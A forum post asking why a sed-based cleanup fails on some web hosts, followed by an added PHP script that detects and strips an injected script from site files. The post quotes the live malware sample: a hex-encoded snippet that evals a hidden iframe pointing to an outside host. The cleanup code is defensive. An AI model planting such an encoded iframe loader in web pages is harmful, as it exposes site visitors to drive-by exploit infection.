Recently I've been trying to fix a slew of viruses on my server, which I suspect are due to the Blackhole toolkit. It appends a JS script to the end of index.php and .html files, which looks like this:
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>
It's an encoded version of the standard iframe virus. I've been trying to remove it by running a PHP script like the one below (which was a solution from Stack Overflow).
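// Strip the injected <script>...eval...</script> text from every .php file under $dir.
$dir = "./";
// sed needs the s#pattern#replacement#g form; stderr is captured into $removejs.
$removejs = `find $dir -name "*.php" -type f | xargs sed -i 's#<script>var t=.*eval.*script>##g' 2>&1`;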
The problem is, the script works on some servers while on others it just seems to have no effect. Does anyone know why? I've tried it on at least 10 separate webhosts. The script only runs successfully on about 3 hosts. On the rest it just doesn't do anything. What settings do I need to change?
Appreciate any help I can get. Thanks!
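
A pure-PHP version of the same cleanup, as an added example that is not part of the original post: it uses no backticks, `find`, `xargs` or `sed`, reports the decoded payload of each hit without executing it, and only rewrites files when asked to. The function names, the `$apply` flag and the sample string are assumptions; it needs PHP 7.1 or later.

```php
<?php
// Added example. Pattern follows the post; names and $apply flag are assumptions.
// Matches: <script>var t="";var arr="<hex>";...eval(t);</script>
const INJECT_RE = '~<script>var t="";var arr="([0-9a-fA-F]+)";.*?eval\(t\);</script>~s';

// Decode the hex payload to text for the incident record; it is never executed.
function decode_payload(string $hex): string {
    return strlen($hex) % 2 === 0 ? (string) hex2bin($hex) : '';
}

// Return [cleaned body, decoded payloads] for one file's contents.
function strip_injection(string $body): array {
    $found = [];
    $clean = preg_replace_callback(INJECT_RE, function ($m) use (&$found) {
        $found[] = decode_payload($m[1]);
        return '';
    }, $body);
    return [$clean ?? $body, $found];
}

// Walk $dir over *.php and *.html; report hits, rewrite only when $apply is true.
function clean_tree(string $dir, bool $apply = false): array {
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!$file->isFile() || !preg_match('~\.(php|html)$~i', $file->getFilename())) {
            continue;
        }
        $path = $file->getPathname();
        $body = @file_get_contents($path);
        if ($body === false) { $report[$path] = ['status' => 'unreadable']; continue; }
        [$clean, $found] = strip_injection($body);
        if (!$found) { continue; }
        $status = 'found';
        if ($apply) {
            $ok = is_writable($path) && file_put_contents($path, $clean, LOCK_EX) !== false;
            $status = $ok ? 'cleaned' : 'not writable';
        }
        $report[$path] = ['status' => $status, 'payloads' => $found];
    }
    return $report;
}

// Constructed sample in the post's shape; the hex decodes to the string "void 0".
// The literal is split so this file does not match its own pattern.
$sample = "<?php echo 1; ?>\n" . '<script>var t="";var ' . 'arr="766f69642030";'
    . 'for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>';
[$clean, $found] = strip_injection($sample);
var_dump($clean === "<?php echo 1; ?>\n", $found); // then: print_r(clean_tree('./'));
```

Run `clean_tree('./')` first to review the report, then `clean_tree('./', true)` to rewrite; a `not writable` status points at file ownership or permissions on that host.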